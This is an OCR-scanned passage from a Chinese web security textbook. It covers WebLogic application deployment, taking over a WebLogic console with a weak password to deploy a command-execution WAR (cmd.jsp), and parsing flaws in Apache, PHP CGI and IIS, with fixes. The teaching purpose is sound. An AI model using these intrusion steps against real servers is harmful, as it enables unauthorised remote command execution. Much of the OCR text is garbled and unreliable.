You modiy sdi or delete tems n tns © | Home Page 

= — Information and Resources 

Domain Structure Helpful Tools General Information 

rte: * Configure applications = Common Administration Task Descriptions 
I-Deployments = RecentTaskStatus — s Read the documentation 

| Set your console = Ask a question on My Oracle Support 
dre Fe = Orade Guardian Overview 

由 -Diagnostics 


一 Domain Configurations 


11-50 输入 用 户 名 、 密 码 进入 WebLogic 的 控制 台 


(3) 通过 Deployments 部 署 应 用 , 如 图 11-51 所 示 。 
(4). 单 击 Install 按钮 安装 应 用 ,如 图 11-52 所 示 + 
(5) 单 击 upload your file(s) Ef£ WAR 包 , 如 图 11-53 所 示 o 


(6) 单 击 “ 选 择 文件 ”按钮 ,选择 本 地 WAR 包 , 如 图 11-54 所 示 。 
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View changes and restarts 


Configuration editing is enabled. Future. 
changes will automatically be activated as 
you modify, add or delete items in this 
domain. 


This page displays a list of Java EE applications and stand-alone application modules that have been installed to this domain. Installed apg 
this page. 


To install a new application or module for deployment to targets in this domain, dick the Install button. 


È Customize this table 


How do L.. 

* Install an Enterprise application. 

* Configure an Enterprise application 

+ Update (redeploy) an Enterprise. 
application. 


* Start and stop a deployed Enterprise 
application 


* Monitor the modules of an Enterprise 
application. 


图 11-51 通过 Deployments 部 署 应 用 


ORACLE WebLogic Server? Administration Console. 


View changes and restarts 
Configuration editing is enabled. Future 
changes will automatically be activated as 


you modify, add or delete items in this 
domain. 


TM rine islas a Mak of Java EE deplictions and sind alos applicatio oodles tia as bean lali tb 
page. 


base domain 
-Environment 
Ioeplormentd 
E-Services 
}--Security Realms 
-Interoperability 
由 -Diagnostics 


To install a new application or module for deployment to targets in this domain, dick the Install button. 


11-52 安装 应 用 


(7) 单 击 Next 按钮 进入 下 一 步 ,如 图 11-55 所 示 。 

(8) 单 击 Next 按钮 进入 下 一 步 , 如 图 11-56 所 示 。 

(9) 单 击 Next 按钮 进入 下 一 步 ,如 图 11-57 所 示 。 

(10) 单 击 Finish 按钮 ,就 完成 了 部 署 ,如 图 11-58 所 示 。 
(11) WebLogic 显示 部 署 成 功 ,如 图 11-59 所 示 。 
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市 taropenabhity 
S-Dogoxic: 


[wsl a 


° Start and stop a deployed Entarprse 
application 


Configure an Enterprise apolication 
Create a deployment pian 

Taroet an Enterprise application to a 
sever 


° Tast the modules in an Entero 
a 


Home »Summary of Deployments 


Install Application Assistant 
eset] wen | [FEF | canoa 


Locate deployment to install and prepare tor deployment 
Select the fie path that represents the application roct directory, archive fie. exploded arce directory, or application module descriptor that you want to instal. You can also enter 
Note: Cr vals e paths are displayad below. 1f you carr tad your deployment RE upon your Tels jr cntm that your appicton certains the requred deployment def 


Path: [c 


[n | [FSE | ons) 


图 11-53 WAR 包 上 传 


(Change center. 

View changes and restarts 
Configuration editing is enabled. Future. 
changes will a be activated as 


you modiy, aad or delete items in this 
domain. 


[ORACLE WebLogic Server? Administration Console 


Home » Summary of Deployments 
Install Application Assistant. 


[Back] [vea [ERR | anc] 
Upload a Deployment to the admin server 


Click the Browse button balow to select an application or module on the machine from which you are ci 


Deployment Archive: 


g- When you have located tho fila, 


Upload a deployment plan (this step is optional) 


A deployment plan is a CA hed Gu GOMMA ha QUOQAE DRE in ia daloriiint areh: A digiuwint wi Wak Wout ite 
packaged as a jar file. See related links for additional information about deployment plans. 


Deployment Plan Archive: 


图 11-54 选择 WAR 包 


Change Center — - 
View changes and restarts 
Configuration editing is enabled. Future 
anges il automaticaly be acted as 


you modify, add or delete items in this 
domain. 


Domain Structure. 
base domain 


-Diagnostics 


ORACLE Weblogic Server? Administration Console 


Home >Summary of Deployments 
Install Application Assistant 


a aes [pem | onn 


Upload a Deployment to the admin server. 


Click the Browse button below to select an application cr module on the machine from which you are currently browsing. When you have located the file, cll. 
Deployment Archive: 


Upload a deployment plan (this step is optional) 


A deployment plan is a configuration which can supplement the descriptors Included in the deployment archive. A deployment will work without a deploymed 
packaged as a .jar file See related links for addtional information about deployment plans. 
Deployment Plan Archive: [Sci | cione 


Back] me | | caxa] 
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图 11-55 单 击 Next 按钮 进入 下 一 步 (1) 


Configuration editng is enabled. Future nud 
anges will automatcaly be. 


saated zc + The fle bolo war haz been uploadod succasfuty to C: oradelPaddencarolucar projecsldemarbace domarivarvarz iminsorvertupload 


ORACLE WebLogic Server? administration Console 


p ——————— — 


Home -Summary of Deployments 


ima [es re ec 

Locate deployment to install and prepare for deployment. 
Suc afa path ut oprecerts appen soat dion, zchue Ne, ldaf ace drain, or pphcubo mede debo at yous wast to rl You can alen erter the | 
wote: Oniy vata Wie pts ze days belon. Y voa cant fad aur delent Mes upload yu le] ander anim tht your apalkcation contains the required dolormen des] 


< rr 
(none) 
192.158.91 108 VC: \ Orade \ Middeware \ wser_projects \ domains \ base domain \ servers \ AdminServer \ upload 


changes will automatically be activated as 
You modify, add or delete ems in this 
main. 


Configuration editing is enabled. Future 

changes will automatically be activated as 
you modify, add or delete items in this 
domain. 


Targets are the servers, clusters, and virtual hosts on which this deployment will run. There are several ways you| 
® Install this deployment as an application 

The application and its components will be targeted to the same locations. This is the most common usage. 

© Install this deployment as a library 

Application libraries are deployments that are available for other deployments to share. bbranes should be avatab| 
[Back [Next] | [EET] | Gan 


图 11-57 单 击 Next 按钮 进入 下 一 步 (3) 


ORACLE WebLogic Server? Administration Console. 


Application Assistant ` 
tios see) | [en] Len, 
Optional Settings 
You can modify these settings or accept the defaults 
— General 
What do you want to name this deployment? 


Name: hello 


— Security — — ——————————————] 
What security model do you want to use with this application? 


® DD Only: Use only roles and policies that are defined in the deployment descriptors. 
@ Custom Roles: Use roles that are defined in the Administration Console; use policies that are defined 


11-58 ii Finish 按钮 完成 部 署 
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11-59 WebLogic 显示 部 署 成 功 

(2) 从 根 目 录 访 问 部 署 的 应 用 ,访问 的 顺序 就 是 WAR 包 解 压 后 的 目录 路 径 , 如 
11-60 所 示 。 

(13) 最 终 的 URL 路 径 就 是 WebLogic 网 站 根 路 径 加 上 /hello/hello. jsp. 


访问 http: //www. ctfs-wiki. com: 7001/hello/hello. jsp. 显示 Hello world, 如 图 11-61 
所 示 。 


此 电脑 > 本 地 磁盘 (D: > hello 
pm ^ http://wwew.ctfs-wiki.com:7001/hello/hellojsp 
* META-INF 
* [lhelojsp 
* 
” 
图 11-60 hello. war 的 目录 路 径 11-61 显示 Hello world 


2) 删除 已 部 署 的 应 用 
单 击 Delete 按钮 ,就 可 以 直接 将 已 部 署 的 应 用 删除 ,如 图 11-62 所 示 。 


ORACLE waebLogic Server? Administration Console 


The page derlar 3 ist of Jova EE epicene ané stand aione arplaton mad les thst have ben rotaled to this domain. Iretaled sookcosəre and moes can be started, stopped, updated (radaploya?), or deeted 
To instala nen aclesten or madde > degieynent te tarots n tis domain, dk he Tratal button- 

jp Customize this table 

Depioymens 


加 | 可 


pee x a 


11-62 Hi Delete 按钮 删除 应 用 


WebLogic 服务 器 返回 删除 成 功 的 状态 ,如 图 11-63 所 示 。 
再 次 访问 之 前 的 链接 ,发 现 应 用 已 经 被 删除 ,如 图 11-64 Bron. 
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Home -Summary of Deployments 
Messages 
< Nl changes have been activated. No restarts are necessary. 
f Selected Deployments were deleted. 


This page displays a ist of Java EE apphcations and stand-alone application modules that have been installed to this domain. Instaled applications and module! 


To install a new application or module for deployment to targets in this domain, dick the Install button. 


p Customize this table 


图 11-63 返回 删除 成 功 的 状态 


A Load URL | httpy//www.ctfs-wiki.com:7001/hello/hellojsp 
spit URL 
®© Execute 


C Enable Post data [] Enable Referrer 


Error 404--Not Found 


From RFC 2068 Hypertext Transfer Protocol — HTTP/1.1: 


10.4.5 404 Not Found 


11-64 应 用 已 被 删除 


2. 利用 autodeploy 自动 部 署 

1) 部 署 应 用 

WebLogic 的 domain 域 下 面 有 autodeploy 目录 。 在 开发 模式 下 , 当 WebLogic 启动 
时 ,会 自动 部 署 autodeploy 目录 下 的 项 目 。 

将 hello. war 放 到 autodeploy 目录 下 : 


root@3c5a7b4490f1:/#1s /root/Oracle/Middleware/user projects/domains/base | 
domain/autodeploy 
hello.war 


发 现 WAR 包 已 经 自动 部 署 , 如 图 11-65 所 示 。 
访问 http: / /www. ctfs-wiki. com: 7001/hello/hello. jsp. 显示 Hello world, 如 图 11-66 
所 示 。 


Web 安全 原理 分 析 与 实践 


[ORACLE WebLogic Server? Administration Console 


zm m man zl ez mp a 
E] 
menm 


HOST DISSRSIEHES ma EF BIORERRIESOISERENGTER, WEVHUORIUOEURE, MISSECHTI-H CUERE, SL, EP (ESS) BIS a IU DEER, 
Sessea IHE iweerES, SETENE. 

[od 

ss 


a [88] [NR] |I] [ES] 


Dome 


rT —r——m 


图 11-65 


aja 


WebLogic 服务 器 自动 部 署 信息 


"m 


http://www.ctfs-wiki.com:7001/hello/hellojsp 


Enable Post data 


Enable Referrer 


Hello world 


图 11-66 显示 Hello world 
2) 删除 已 部 署 的 应 用 


删除 autodeploy 目录 下 的 WAR 包 , 应 用 就 会 自动 被 删除 ,如 图 11-67 所 示 。 


main/aut 


Jepl 
autodepl 


图 11-67 删除 autodeploy 目录 下 的 WAR 包 
WebLogic 服务 器 显示 应 用 已 经 被 删除 ,如 图 11-68 所 示 。 


nain 


[773 会 = 页 nm mum Doom mm || _ J&J 
查看 更 改 和 重新 启动 HO 
USERS. Semea Tumme | | 部 加 本 要 
Eius — 
域 中 的 项 目 时 格 自 动 数 活 之 些 更 改 。 — 
域 结构 
| hase domain 此 页 显示 了 已 经 安装 到 此 域 的 Java EE RUSEURRIEUIUSRIFIKATIR, EIIEUGUAEREERE, 然后 使 用 此 页 中 的 控件, 可 以 从 此 域 中 启动 全 
二 要 安装 新 应 用 性 序 或 模块 以 部 轩 到 此 域 中 的 目标 , 请 单 去 dct etm, 
banta 
w AR 
一 一 =] sese] [EF] [mue] | [启动 -| [FE 
图 11-68 WebLogic 服务 器 显示 应 用 已 经 被 删除 


再 次 访问 之 前 的 链接 ,发 现 应 用 已 经 被 删除 ,如 图 11-69 所 示 。 
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Load URL | http://www.ctfs-wiki.com:7001/hello/hellojsp 


a 
E 


© Execute 


[C Enable Post data []Enable Referrer 


Error 404--Not Found 


From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1: 


10.4.5 404 Not Found 


图 11-69 成功 删除 应 用 


3. 利用 config.xml 配置 文件 部 署 
domain 域 的 config 目录 下 有 config. xml 文件 ,应 用 部 署 的 配置 在 configuration- 


version 和 admin-server-name 之 间 。 


<configuration-version>10.3.1.0</configuration-version> 
<app-deployment> 

<name>_appsdir_hello_war</name> 
<target>AdminServer</target> 
<module-type>war</module-type> 
<source-path>c:/hello.war</source-path> 
<security-dd-model>DDOnly</security-dd-model> 
<staging-mode>stage</staging-mode> 

</app-deployment> 

<admin- server-name>AdminServer</admin- server-name> 


重启 WebLogic, 应 用 已 经 自动 部 署 ,如 图 11-70 所 示 。 


[ORACLE WebLogic Server” Administration Console: 


sme Logout eere E necrd p || — — |a] 


Hone »Semmary of Deployments 


Summary of Deployments 
Contr | Monterng 


This page deris ys ist of Java FE applicatione and stand sone appicaton mechdes that have been itae to this doman Tastaled applications and modides can be staried, stoppad, updated 
Toirstal a new apokcation or mode for depbymert to targets in this doman, Gd he nsta button. 


— 
Deployments 
lm re] [ee] Br [Bes] 


EP Ee w | 


11-70 WebLogic 服务 器 部 署 应 用 成 功 信息 


访问 http: / /www. ctfs-wiki. com: 7001/hello/hello. jsp. 显示 Hello world, 如 图 11-71 
所 示 。 
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[él toad URL [hup7/www.ctfs-wikicom:7001/hello/hellojsp 
网 Split URL 
|© Execute 


L Enable Post data [ ] Enable Referrer 


Hello world 


图 11-71 显示 Hello world 


11.7.2 WebLogic 弱 口 令 漏洞 利用 


WebLogic 中 间 件 部 署 应 用 的 一 种 方式 是 : 通过 用 户 名 、 密 码 登录 控制 台 后 ,在 控制 
台 进 行 应 用 部 署 。 如 果 控 制 台 存 在 弱 口 令 , 就 可 以 通过 弱 口 令 进入 控制 台 , 部 署 木 马 应 
用 ,获得 WebLogic 服务 器 的 shell 权限 。 

步骤 如 下 : 


CD 打开 WebLogic 的 控制 台 ,WebLogic 的 控制 台 的 默认 路 径 是 根 目 录 下 的 console 
目录 ,如 图 11-72 所 示 。 


WebLogic Server* 11g 


Welcome. 


Log in to work with the ViebLogi Server domain. 


Username 
Password 


11-72 WebLogic 控制 台 登 录 界 面 


(2) 输入 用 户 名 、 密 码 后 进入 WebLogic 的 控制 台 , 如 图 11-73 所 示 。 


ORACLE WebLogic Server® Administration Console 


Change Center f Home Log Out Preferences [Æ] Record Help | 

View changes and restarts Welcome, weblogic | Connected to: base. domain 
Configuration editing is enabled. Future Home 

changes will automatically be activated as 

you modify, add or delete items in this Home Page. 

domain. 

— Information and Resources 

Domain structura, Helpful Tools General Information 
ae x 。 Configure applications s Common Administration Task Descriptions 
[Deployments = Recent Task Status = Read the documentation 
jii * Set your console = Ask a question on My Oracle Support 

| Security Realms preferences H 
由 -Interoperability Oracle Guardian Overview 

"Diagnostics — Domain Configurations 


11-73 WebLogic 的 控制 台 
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(3) 通过 Deployments 进行 部 署 ,如 图 11-74 所 示 。 


(camas oter — 
View changes and restarts Home >Summary of Deployments 
Configuration editing is enabled. Future Summary of Deployments 
Changes wil automatically be activated as 
you modify, add or delete items in this Control | Monitoring | 
domain. — 
Domain Structure. This page displays a list of Java EE applications and stand-alone application modules that have been installed to this domain. Installed apr] 
be donan this page. 
anamen, To install a new application or module for deployment to targets in this domain, dick the Install button. 
A. P Customize this table 
Diagnostics 


instan] [Update [Delete] | [Stat] [Stop «| 


How do L.. 


* Install an Enterprise application. 

* Configure an Enterprise application. 

* Update (redeploy) an Enterprise 
application. 


* Start and stop a deployed Enterprise. 
application. 


* Monitor the modules of an Enterprise 
application. 


11-74 部署 应 用 


(4) 单 击 Install 按钮 ,进行 应 用 安装 ,如 图 11-75 所 示 。 


ORACLE WebLogic Server? Administration Console. 


Configuration editing is enabled. Future 
d will automatically be activated as 
Ton nodify, add or delete items in this 
lomain. 


This page displays a lt of ava EE applications and stand-alone application modules that have been installed to 
page. 


To install a new application or module for deployment to targets in this domain, click the Install button. 


G 
本 peployment 
Services 


Security Realms 
(--Interoperability 
由 -Diagnostics 


图 11-75 安装 应 用 


(5) 单 击 upload your file(s) 按 钮 ,进行 WAR 包 上 传 ,如 图 11-76 所 示 。 
(6) 单 击 “ 选 择 文件 ”按钮 ,将 本 地 WAR 包 选 中 ,如 图 11-77 所 示 。 
(7) 单 击 Next 按钮 进入 下 一 步 ,如 图 11-78 所 示 。 
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ORACLE WebLogic Server? Adminisvetion Console 
[onanga — —— fi Home Log Out Preferences 2 Record Heb | iaJ 
AAR Home -Summary of Deployments 
on edema < enabiec. mue | [Instamapphcatoq Assistant 
cangos wl oret be conte a5 
You modi, add or delete tems in ths [FK 
Pal. La caxa 
Locate deployment to install and pregare for deployment 
(emp. Select the fie path that reocesents the agplcation roct directory, archive fe, ploded archive directory, or appliaton module descriptor that you wart to instal. You cen also ener 
-Environment confi ur application contains the requir ven 
me “stan that your ppm certas | 
serve 
Security Realms ja 5 
-Interoperability Recently Used Paths: (nne) 
-Diagnosis Current Location: p 
apahetomcat-7.057 
Documents ané samngs 
C) nist sera 
mapa 
[P 
DJs 23. 
How do L.. a Boat 
Start and stop a deployed Enterpnse. M 
oan reali 
| Conga an Enterptse anlicalon Bios Vio 
° Crate a deployment pian Ba T 
| Taret an Enterorise appkcaion to a p 
p 
| Tost the modus n an Enterpreo [sa Leat) | [FEET | Loncat 
din eal | 


图 11-76 上 传 WAR 包 


ORACLE WebLogie Server? Administration Console 


Meer P emos Mime] a 
Here Summary c Depirrments 
Iota Apphcation Matan 


LL 
Upload a Deployment to the adn server 


OMO th Browna button tios to selec an agplcatun or modd on he machas from wi ya ar rry brown, Vn you have ecd te He, cc he Net button to icd th decimae to the Admnarton Sn, 


MARE] md war 


B ana 


图 11-77 选择 本 地 WAR 包 


ORACLE WebLogic Server? Administration Console 

Change Center fà Home Log Out Preferences [Æ] Record Help 
View changes and restarts 
Configuration editing is enabled. Future 
changes will automatically be activated as 


you modify, add or delete items in this 
domain. 


Domain Structure 
base domain Targets are the servers, clusters, and virtual hosts on which this deployment will run. There are several ways you| 
由 -| 

tte @ Install this deployment as an application 

-Servi 

| saway abu The application and its components will be targeted to the same locations. This is the most common usage. 
-Interoperabilty 

由 -Diagnostics 目 Install this deployment as a library 


Application libraries are deployments that are available for other deployments to share. Libraries should be availabl 


| Back] [Next] | [Fsh] | Lcance!] 


图 11-78 单 击 Next 按钮 进入 下 一 步 


286 


m——— 第 11 章 中 间 件 漏洞 mam 


(8) 单 击 Finish 按钮 就 完成 了 部 署 , 如 图 11-79 所 示 。 


ORACLE WebLogic Server? Administration Console. 


You can modify these settings or accept the defaults. 
— General 
What do you want to name this deployment? 


Name: cmd 


— Security 
What security model do you want to use with this application? 
€ DD Only: Use only roles and policies that are defined in the deployment descriptors. 


© Custom Roles: Use roles that are defined in the Administration Console; use policies that are defined in the der 


= 5 ®© Custom Roles and Policies: Use only roles and policies that are defined in the Administration Console. 
How do L.. 

d stoo a deoloved Enterprise | | © Advanced: Use a custom model that you have configured on the realm's configuration page. 
— Source accessibility. 


How should the source files be made accessible? 


> Start and stop a deployed Enterprise. 
application. 

Configure an Enterprise application 
Create a deployment plan 

Target an Enterprise application to a 
server 

° Test the modules in an Enterprise 
application. 


€ Use the defaults defined by the deployment's targets 

Recommended selection. 

© Copy this application onto every target for me 

During deployment, the files will be copied automatically to the managed servers to which the application is targeted, 


© 1 will make the deployment accessible from the following location 
Failed (0) 
Critical (0) 
Overloaded (0) 
Warning (0) 

mmm o0 


Location: CXOracielMiddlewareluser projectsidomainsibase domainlserv| 


Provide the location from where all targets will access this application's files. This is often a shared directory. You must ensure th 


11-79 Hi Finish 按钮 完成 部 署 


(9) WebLogic 显示 部 署 成 功 ,如 图 11-80 所 示 。 


| ORACLE webLogic Server? Administration Console. 


Gore Center LL iai n C 
TY FE 一 
w 
—— Fins. 
changes will automatically be activated as f The file cmd.war has been uploaded successfully to C VOracie Widdiewareluser projects domainsVbase. domainiserversMdrirerver upload. 
you modify, add or delete items in this 
domain. Install Application Assistant. 


Mid] | Eie] | ica) 

Locate deployment to install and prepare for deployment 
Select the file path that represents the apolication root directory, archive file, oploded archive directory, ar application module descriptor that you want to install. You can also enter the pat 
Note: Oniy valid fle paths are displayed belon.. If vou cannot find your deoloyment fles ucload vour fles) and/or confirm that your application contains the required deployment descri 


Path: [C*OracieWiddenereluser. projectsidomainsibase domairiserversAdminServeriupioadicmd war 

Recentiy Used Paths: (none) 

Current Location: 19216631306 | C: V Orace | Middleware | user prejects| domains base domain \ severs | AdminGerver \ upload 
© E mawar 


iss [ERN] a 


11-80 WebLogic 显示 部 署 成 功 


(10) 访问 http: //www. ctís-wiki. com: 7001/cmd/cmd. jsp. 可 以 执行 命令 ,如 
图 11-81 所 示 。 
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|) ”Load URL [http;//www.ctfs-wiki.com:7001/cmd/cmd jsp 
Ñ  SplitugL 
(P) Execute 

Enable Post data [] Enable Referrer 
|Commands with JSP 


Send 


图 11-81 可 以 执行 命令 


11.8 ”思考 题 
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. 常见 的 中 间 件 有 哪些 ? 

. 简 述 IIS 6.0 PUT 上 传 漏洞 的 原理 及 利用 方式 。 

. 短文 件 名 的 原理 是 什么 ? 

. IIS 短文 件 名 漏洞 原理 是 什么 ? 

. JBoss 服务 器 常见 的 漏洞 有 哪些 ?如 何 利用 这 些 漏洞 ? 


简 述 Tomcat 远程 代码 执行 漏洞 的 原理 。 
简 述 Tomcat 弱 口 令 攻击 漏洞 的 利用 及 修复 方式 。 


. 简 述 WebLogic 部 署 应 用 的 几 种 方式 。 


简 述 WebLogic 服务 器 常见 的 漏洞 利用 方式 。 


Web 安全 原理 分 析 与 实践 


解析 漏洞 


|. Web 容器 解析 漏洞 简介 


Web 容器 解析 漏洞 会 将 其 他 类 型 的 文件 当 作 脚 本 语言 的 文件 进行 解析 ,执行 其 中 的 
代码 。Web 容器 解析 漏洞 产生 的 原因 是 Web 容器 存在 漏洞 ,导致 在 解析 攻击 者 恶意 构 
造 的 文件 时 ,无 论 此 文件 是 什么 类 型 ,都 会 执行 其 中 的 代码 。 

Web 容器 解析 漏洞 的 危害 极 大 ,会 造成 服务 器 被 远程 控制 .网 页 被 算 改 ,网 站 被 挂 
马 .被 安装 后 门 等 。 

一 般 ,在 利用 解析 漏洞 时 都 要 配合 文件 上 传 的 功能 。 

常见 Web 容器 有 IIS. Nginx, Apache, Tomcat, Lighttpd 等 。 

下 面 是 Web 容器 解析 漏洞 的 示例 。 

test, php. aaa 文件 的 内 容 是 二 ?php phpinfo();? 之 ,此 文件 的 扩展 名 是 aaa, 正 常情 况 
下 Web 容器 不 会 将 它 当 作 PHP 文件 来 解析 。 但 是 ,如 果 Web 容器 存在 解析 漏洞 ,就 会 
将 test. php. aaa 当 作 PHP 文件 来 解析 ,执行 其 中 的 代码 ,如 图 12-1 所 示 。 


图 12-1 解析 漏洞 示例 


mem Web 安全 原理 分 析 与 实践 


| 122 Apache 解析 漏洞 


Apache HTTP Server( 简 称 Apache) J& Apache 软件 基金 会 的 一 个 开放 源码 的 网 页 
服务 器 ,可 以 在 大 多 数 计算 机 操作 系统 中 运行 , 因 其 多 平台 性 
和 安全 性 而 被 广泛 使 用 ,是 最 流行 的 Web 服务 器 端 软件 之 一 。 
Apache 标识 如 图 12-2 所 示 。 


12.2.1 漏洞 形成 原 图 12-2 Apache 标识 


在 Apache 1.x 和 2.x 版 本 中 ,Apache 可 以 识别 多 个 文件 扩展 名 。 如 果 文 件 存 
在 多 个 扩展 名 ,Apache 会 从 后 向 前 开始 解析 ,如 果 遇 到 Apache 配 置 文件 中 的 
mime, types 没有 定义 的 扩展 名 ,就 继续 向 前 解析 ,直到 识别 出 可 以 解析 的 扩展 名 ， 
如 果 所 有 扩展 名 都 无 法 解析 ,就 会 以 DefaultType 的 默认 值 text/plain 将 该 文件 当 
作文 本 解析 。 

默认 mime. types 在 /etc/mime. types 中 ,如 图 12-3 所 示 。 


# 
# TypesConfig describes where the mime.types file (or equivalent) is 
# to be found. 


APACHE 


HTTP SERVER 


+ 
TypesConfig /etc/mime.types 


+ 
# DeraultType is the default MIME type the server will use for a document 
# if it cannot otherwise determine one, such as from filename extensions. 
# If your server contains mostly text or HTML documents, "text/plain" is 

* a good value. If most of your content is binary, such as applications 

# or images, you may want to use "application/octet-stream" instead to 

# keep browsers from trying to display binary files as though they are 

# text. 


E 

DefaultType text/plain 
# 
# The mod mime_magic module allows the server to use various hints from the 


# contents of the file itself to determine its type. The MIMEMagicFile 
# directive tells the module where the hint definitions are located. 


12-3 mime.types 的 位 置 


mime. types 中 定义 了 文件 的 处 理 程序 ,如 图 12-4 所 示 。 


12.22 Apache 解析 漏洞 示例 分 析 


例如 ,文件 file. php. en 内 容 为 <?php phpinfo();? 之 ,包含 两 个 扩展 名 : . php 
和 . en。 

解析 过 程 是 : Apache 从 后 向 前 开始 解析 ,首先 把 file. php. en 当 作 en 文件 来 解析 ， 
mime. types 没有 定义 处 理 en 扩展 名 的 程序 ,就 继续 解析 php. mime. types 中 定义 了 
PHP 文件 的 解析 程序 ,就 会 将 file. php. en 当 作 PHP 文件 来 解析 。 

访问 http: //www. ctfs-wiki. com/file. php. en. Apache 会 将 file. php. en 当 作 PHP 
文件 来 解析 ,执行 phpinfo 代码 ,如 图 12-5 所 示 。 
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Typesconfig /etc/mims.types 


Defaultrype is the default MIME type the server will use for a document 
if it cannot otherwise determine one, such as from filename extensions. 
If your server contains mostly text or HTML documents, "text/plain" is 
a good value. IT most of your content is binary, such as applications 
or images, you may want to use "application/octet-stream" instead to 
keep browsers from trying to display binary files as though they are 
text. 


eoo e o e e oe 


DefaultType text/plain 


The mod mime magic module allows the server to use various hints from the 
Contents of tne file itself to determine its type. The MIMEMagicFile 
directive tells the module where the hint definitions are located. 


PEE 


MIME type Extensions 
application/3gpp-ims-*xml 
application/activemessage 


application/andrew-inset ez 
apblication/applefile 

application/atomexml atom 
application/atomicmail 

application/atomcatexml atomcat 
application/atomsvcexml atomsuc 
application/auth-policy*xml apxml 
application/batch-SMTP 

application/beepeanl 

application/cals-1840 

application/ccxmlexml ccxml 
application/cea-2018«xml 

application/cellml:xml cellml cml 
application/cnrpexml 


application/commonground 
application/conference-inforxml 


图 12-4 mime. types 的 内 容 


hrtp//wwwctfs-wiki.corn/flle. php en C $ @ Qr 


System. [Unus 9t2acbbs dO 4 4 0-103-2ereric $132-Utuntu SUP Tue Jan 9 19:52 30 UTC 2018 
LX 
BuMDate — Aus 11201620348 


[Configure — ucorfigurz —-bulidexGS, 64 rodhat-irux gau ` no9t-x06_54 redhatlinux gnu 
Command ^ terget-xd6, 4-rechatinux on. —program-prete= -prefr-lusr —erec-prefirshisr 一 


|snarsastatedrsvartiy —randir-tusuisharermarr -itodir-tususbarelnty cache- 

|fio-.Jcontg cache "wn libdir-lio6 4 "win. confg flc-patr-/elc wih-confg fic-zcan- 

|dr-letziohb.G —disatle-debug -with-oic —dsable-Tatfi -vthoutpear —wrh-tz2 -wih- 
"—wit-fieelype-Giredusf 


lenatle-sysvmsg -wih-kerberos -enable-uco-smmp-hack —-enable-shmop enable- 
Calendar —thcu-sdiite —wit-ibumi-dr-lusr enable- wih-system-tzdata' with- 
| ss2=husrisbintapss -wiboutmysal -without-34 -disahle-domy dsabla-dba — 
|witneu-anbCCBC: -diseble-cdo —disaole-umiresder —disatie-mhwiller -winhouLsqlles 
|--dicablo phar - dcabio flcirfc 4izatle-jcor' -witout pepal! "-dizatle-wdar - wihout- 
(cur —assatle-posix -disablesysvmsd -Gsaple-s/svshm -asable-srsveenr 

Server API _ [Apache 20 Handler 

|Virtual [asavisd 


Loaded Jietughp ini. 


Scan this dir | eephpd 


12-5 Apache 解析 漏洞 示例 效果 
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12.23 Apache 解析 漏洞 修复 
修改 Apache 的 配置 文件 ,防止 文件 名 中 有 “. php. ”的 文件 被 执行 。 
<FilesMatch ". (php\. IPhp3N. Iphp5N. Iphp7\.) "> 

Order Deny,Allow 


Deny from all 
</FilesMatch> 


123 _ PHP CGI 解析 漏洞 


12.3.1 CGI 简 介 


CGI(Common Gateway Interface, 通 用 网 关 接 口 ) 是 一 种 规范 ,而 并 不 是 一 种 语言 。 
几乎 所 有 服务 器 都 支持 CGI, 可 用 任何 语言 编写 CGI, 包 括 流行 的 CC++、VB 和 
Delphi 等 , 

Web 服务 器 收 到 用 户 请 求 ,并 把 请 求 提交 给 CGI 程序 ;CGI 程序 根据 请 求 提交 的 参 
数 作 相应 处 理 ,然后 输出 标准 的 HTML 语句 返回 给 Web 服务 器 ;Web 服务 器 再 返回 给 
客户 端 。 这 就 是 CGI 的 工作 原理 。CGI 实现 了 动态 网 页 的 功能 。 


12.3.2 fastcgi 简介 


CGI 的 特点 是 : 每 收 到 一 个 请 求 , Web 服务 器 都 要 派生 (fork) 出 一 个 单独 的 CGI 程 
序 的 进程 来 处 理 。 这 种 方式 的 好 处 是 使 Web 服务 器 和 具体 的 程序 处 理 相互 独立 ,结构 清 
晰 ,可 控 性 强 ;但 是 ,如 果 在 高 访问 量 的 情况 下 , CGI 的 进程 派生 就 会 成 为 服务 器 的 很 大 
负担 。 

fastcgi 是 基于 CGI 架构 的 扩展 , 它 的 核心 思想 就 是 在 Web 服务 器 和 具体 CGI 程序 
之 间 建 立 一 个 智能 的 可 持续 的 中 间 层 ,统一 管理 CGI 程序 的 运行 。 这 样 , Web 服务 器 只 
需要 将 请 求 提交 给 这 个 中 间 层 ,这 个 中 间 层 再 派生 出 几 个 可 复 用 的 CGI 程序 实例 ,然后 
再 把 请 求 分 发 给 这 些 实例 。 这 些 实例 是 可 控 的 、 可 持续 的 、 可 复 用 的 ,因此 一 方面 避免 了 
进程 反复 派生 , 另 一 方面 又 可 以 通过 中 间 层 的 控制 和 探测 机 制 来 监视 这 些 实例 的 运行 情 
况 , 根 据 不 同 的 状况 派生 或 者 回收 实例 ,达到 灵活 性 和 稳定 性 兼顾 的 目的 。 


12.8.3 PHP CGI 解析 漏洞 


PHP 的 配置 文件 中 有 一 个 参数 是 cgi. fix_pathinfo, 如 果 设置 了 cgi. fix pathinfo— 1, 
则 在 访问 http: //www. ctfs-wiki. com/x. jpg/x. php 时 ,如 果 x. php 不 存在 ,PHP 2 š 
归 向 前 解析 ,如 果 x. jpg 存在 ,就 会 把 x. jpg 当 作 PHP 文件 解析 ,这 样 就 产生 了 解析 
漏洞 。 
IIS 7. x 和 Nginx 中 间 件 解析 PHP 文件 时 ,默认 PHP 的 配置 文件 都 开启 cgi. fix_ 
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pathinfo ,导致 产生 解析 漏洞 。 
访问 http: //www. ctfs-wiki. com/test. jpg/x. php, 会 将 test. jpg 当 作 PHP 文件 来 
解析 ,执行 phpinfo 代码 ,如 图 12-6 所 示 。 


€) D nttpl/wwwcctfs-wiki.conytestjpg/x php C & w Q ëm <Cri*K> 


[Windows NT TEST-B9EDF20207 5.2 build 3790 (Windows Server 2003 Enterprise 


Edition Service Pack 2) i585 


serit [nologo configure is *—enale-snapshot- uil" "—enable-debug pack ~ 
dizable-zts" "—disable-isapi' "--disabie-nsapi" "without-mssq! "without. 
ER NOUUCLI 5 tel SnLEE 
Ndkshared' *- 
E losen dodici dard RE 
UE 


shared" * -with 
aana =. disable sal analyee* 


[Virtual Directory | disabled 


Support 
Configuration | WINDOWS 


Cäphpstudyiphp\php 5445-nts\phpin 


12-6 PHP CGI 解析 漏洞 示例 


124 US 解析 漏洞 


12.4.1 IIS 6.0 解析 漏洞 


1. IIS 6.0 文 件 名 解析 漏洞 
IIS 在 处 理 有 分 号 (; ) 的 文件 名 时 ,会 截断 分 号 后 面 的 部 分 ,造成 解析 漏洞 。 


